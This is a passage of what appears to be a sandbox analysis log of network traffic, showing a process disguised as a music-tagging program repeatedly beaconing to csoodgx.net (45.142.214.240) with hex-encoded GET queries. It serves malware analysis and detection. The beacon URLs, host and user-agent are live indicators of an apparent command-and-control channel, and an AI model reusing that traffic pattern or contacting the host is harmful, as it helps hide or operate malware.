Mar 29, 2024 12:10:06.232199907 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:06.539088011 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:06 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49739 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:06.876571894 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:07.185797930 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:07 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49740 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:07.520008087 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:07.818260908 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:07 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49741 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:08.153311014 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:08.456115961 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:08 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49742 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:08.794656038 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:09.091121912 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:08 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:09.201668024 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:09.503828049 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:09 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49744 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:09.844841957 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:10.152059078 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:10 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49746 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:10.485513926 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:10.786386013 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:10 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49747 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:11.167851925 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:11.476926088 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:11 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49748 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:13.038892984 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:13.344556093 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:13 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:13.452003956 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:13.752072096 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:13 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49749 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:14.094012976 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:14.401448965 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:14 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:14.514655113 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:14.812182903 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:14 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:14.920798063 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:15.224502087 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:15 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49750 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:15.568464041 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:15.867146969 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:15 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49751 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:16.200825930 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
  Host: csoodgx.net
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:16.509687901 CET | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Fri, 29 Mar 2024 11:10:16 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49752 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:16.841602087 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:17.147675991 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49753 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:17.483335018 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:17.791408062 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:17.904398918 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:18.211899042 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49754 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:18.543549061 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:18.839035034 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:18.951435089 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:19.252229929 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49755 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:19.594654083 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:19.894037962 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49756 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:20.232000113 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:20.537019014 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49757 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:20.874262094 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:21.181425095 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49758 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:21.519109011 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:21.820341110 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49759 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:22.153074980 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:22.468333006 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:22.576565981 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
